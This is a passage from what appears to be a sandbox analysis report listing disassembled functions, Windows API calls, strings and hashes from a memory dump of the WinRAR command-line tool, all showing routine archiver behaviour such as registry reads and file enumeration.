Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: 59f059c4cc9d4195e5f6367a44b98e72212f092c60365ea5baa1427c1cebaa58
Instruction ID: 44310c2826a3df9b50e28ac2005ff8a553384d608226f3a787f3ec6038006849
Opcode Fuzzy Hash: 59f059c4cc9d4195e5f6367a44b98e72212f092c60365ea5baa1427c1cebaa58
Instruction Fuzzy Hash: 53E2D32AA09AC285EB20EF25D8402FDA7A5FB45788F854037CA6E077D6DF3DD546C390

Function 00007FF7F7EC48CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F7EC4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF7F7E9CC90), ref: 00007FF7F7EC4AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC492E
GetVersionExW.KERNEL32(?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC496A
LoadLibraryW.KERNELBASE(?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC4993
LoadLibraryW.KERNEL32(?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC499F

Strings

rarlng.dll, xrefs: 00007FF7F7EC493A

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction ID: 80bc950322ee779455e63fd7d5d51ef5abc6062c6e7bf85ff00dcbada023387e
Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction Fuzzy Hash: D7319239618A52C5FB24AF25E8406E8A7A0FB45798FC04037EA6E43AD4DF3CD54BC790

Function 00007FF7F7EA46EC Relevance: 7.6, APIs: 5, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA4736
FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA476B
GetLastError.KERNEL32(?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA477A
FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA47A4
GetLastError.KERNEL32(?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA47B2

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction ID: 4403eecbdb54f42d2b16d8cb92492dd164810f46941a43252593ea889150529d
Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction Fuzzy Hash: 7541EA3A70868196EB64AB29E5402E8A350FB497B4F800332FA7E437C5DF6CD15AC350

Function 00007FF7F7E9901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF7F7E9904D
CryptGenRandom.ADVAPI32 ref: 00007FF7F7E99061
CryptReleaseContext.ADVAPI32 ref: 00007FF7F7E99074

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction ID: d135c4af46920bf6009c323af5bb0a46ea531c90b5e132700632694fbb740d61
Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction Fuzzy Hash: F301622AB0865082E7409B16A844779A761EBD4FD4F988432DE6E43BA4CF7DD5468740

Function 00007FF7F7E8B540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

CharToOemA.USER32 ref: 00007FF7F7E8B900

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Char
String ID:
API String ID: 751630497-0
Opcode ID: 6f56d019d4e2a31f9ab4d26e2ca55949b143ab16f30f51743a8115627407802b
Instruction ID: 80638a42fe03ae14db6ab500a0e36d417cab69a93fdde81ea1816a2fa616a4f6
Opcode Fuzzy Hash: 6f56d019d4e2a31f9ab4d26e2ca55949b143ab16f30f51743a8115627407802b
Instruction Fuzzy Hash: DF22A136A086C296E714EF34D4401FEBBA0FB50748F884137DA5E5A2D9DE7CE952C7A0

Function 00007FF7F7EAAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7F7EAB0C7

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de8636332a38a84dbc9f6d867c902366e91941da8db13d16de16ab686187439
Instruction ID: 6a1927a304627c8f2f9e005b15bc8da6ea3b3208f6152cbc14a0bd551a9ec218
Opcode Fuzzy Hash: 1de8636332a38a84dbc9f6d867c902366e91941da8db13d16de16ab686187439
Instruction Fuzzy Hash: 6871EF32B0568186D704EF35E4456EDB391FB88B98F084136CB6E8B3D9DF7CA44287A0

Function 00007FF7F7EC3EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF7F7EC3EF9
GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F7EC3E8F,?,00007FF7F7EB7E90), ref: 00007FF7F7EC3F14
snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EC43C6

Strings

*messages***, xrefs: 00007FF7F7EC4080
*messages***, xrefs: 00007FF7F7EC4050
DIALOG, xrefs: 00007FF7F7EC4227
DIRECTION, xrefs: 00007FF7F7EC4243
@%s:, xrefs: 00007FF7F7EC43A5
RTL, xrefs: 00007FF7F7EC437A
MENU, xrefs: 00007FF7F7EC4235
,, xrefs: 00007FF7F7EC43FB
$%s:, xrefs: 00007FF7F7EC439E
STRINGS, xrefs: 00007FF7F7EC4219
\, xrefs: 00007FF7F7EC4519

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: FileModuleNamesnprintfwcschr
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
API String ID: 602362809-1645646101
Opcode ID: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
Instruction ID: 1eb91ea678215838c3a3fdc5f31ae399f56bcd67d453d687ec2b07ca4f04104f
Opcode Fuzzy Hash: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
Instruction Fuzzy Hash: 5D22C22EA1868285EB20EB15D4406F9A761FF45788FC04137EA6F876D5EF3CE54AC390

Function 00007FF7F7E94FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF7F7E95043
wcschr.LIBVCRUNTIME ref: 00007FF7F7E95129

Strings

.rar, xrefs: 00007FF7F7E9508E
FUADPXETK, xrefs: 00007FF7F7E9503C
stdin, xrefs: 00007FF7F7E952C2
.rar, xrefs: 00007FF7F7E950E6
AFUMD, xrefs: 00007FF7F7E95122
.part, xrefs: 00007FF7F7E950A5

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: wcschr
String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
API String ID: 1497570035-1281034975
Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction ID: f80c8fd247f82ea9e419ff1312be5a76a8a7f11d8a4ca8b6fdd0bbc20e1f6e9a
Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction Fuzzy Hash: 73C1B76AA1858280EB64BF25D8511FC9361EF46784FD44137E96F4A6DADE2CE503C3B0

Function 00007FF7F7EC7F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7F7EC805C

Part of subcall function 00007FF7F7ECB3F0: GetSystemDirectoryW.KERNEL32 ref: 00007FF7F7ECB41E

GetProcAddressForCaller.KERNELBASE ref: 00007FF7F7EC7F88
GetProcAddress.KERNEL32 ref: 00007FF7F7EC7FA3

Strings

CryptProtectMemory failed, xrefs: 00007FF7F7EC8009
CryptProtectMemory, xrefs: 00007FF7F7EC7F7E
Crypt32.dll, xrefs: 00007FF7F7EC7F66
CryptUnprotectMemory failed, xrefs: 00007FF7F7EC8053
CryptUnprotectMemory, xrefs: 00007FF7F7EC7F95

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AddressProc$CallerCurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 1389829785-2207617598
Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction ID: da6b88fe4e7230d512935c389eee19f8d3bfc061d0c2a6e1a73c42d37511eb1e
Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction Fuzzy Hash: 89413B2DA08A8291FB15BB12A940575A7A1AF49BE4FC40132CC7E07BE4DE7CE453C3A5

Function 00007FF7F7EDB0FC Relevance: 13.6, APIs: 9, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF7F7EDB110

Part of subcall function 00007FF7F7EDAA8C: __isa_available_init.LIBCMT ref: 00007FF7F7EDAAA9
Part of subcall function 00007FF7F7EDAA8C: __vcrt_initialize.LIBVCRUNTIME ref: 00007FF7F7EDAAAE

__scrt_fastfail.LIBCMT ref: 00007FF7F7EDB11E

Part of subcall function 00007FF7F7EDB52C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7F7EDB548
Part of subcall function 00007FF7F7EDB52C: RtlCaptureContext.KERNEL32 ref: 00007FF7F7EDB571
Part of subcall function 00007FF7F7EDB52C: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F7EDB58B
Part of subcall function 00007FF7F7EDB52C: RtlVirtualUnwind.KERNEL32 ref: 00007FF7F7EDB5CC
Part of subcall function 00007FF7F7EDB52C: IsDebuggerPresent.KERNEL32 ref: 00007FF7F7EDB620
Part of subcall function 00007FF7F7EDB52C: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F7EDB641
Part of subcall function 00007FF7F7EDB52C: UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F7EDB64C

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7F7EDB12C
__scrt_fastfail.LIBCMT ref: 00007FF7F7EDB143
__scrt_release_startup_lock.LIBCMT ref: 00007FF7F7EDB1A0
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF7F7EDB1B6
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF7F7EDB1E6
__scrt_is_managed_app.LIBCMT ref: 00007FF7F7EDB21B
__scrt_uninitialize_crt.LIBCMT ref: 00007FF7F7EDB239

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
String ID:
API String ID: 552178382-0
Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction ID: 33de1975acc27ec0e11f5f9a9a7be28b241ae3ada2a4b42adfc5f2ebe130f186
Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction Fuzzy Hash: 10315219E0818341FB14BB2495913B9A391AF45784FC80436E67F0B6D3EE6CE80782F1

Function 00007FF7F7EC4774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF7F7EC495D,?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC47DB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF7F7EC495D,?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC4831
ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF7F7EC495D,?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC4853
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7F7EC495D,?,?,?,00007FF7F7EB7E7D), ref: 00007FF7F7EC48A6

Strings

LanguageFolder, xrefs: 00007FF7F7EC4806
Software\WinRAR\General, xrefs: 00007FF7F7EC47CD

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CloseEnvironmentExpandOpenQueryStringsValue
String ID: LanguageFolder$Software\WinRAR\General
API String ID: 1800380464-3408810217
Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction ID: 1eaf10367d5119c7677a3689614662126f4d6810b7d298ac69e12c55c99bc111
Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction Fuzzy Hash: 0F31E82A718A8141EB10EB25E8416F9A751FF85794FC04232EE6E47BD9EF6CD10AC750

Function 00007FF7F7EB4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB43D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB4402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB443E

Strings

AppData, xrefs: 00007FF7F7EB43F7
Software\WinRAR\Paths, xrefs: 00007FF7F7EB43BC

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
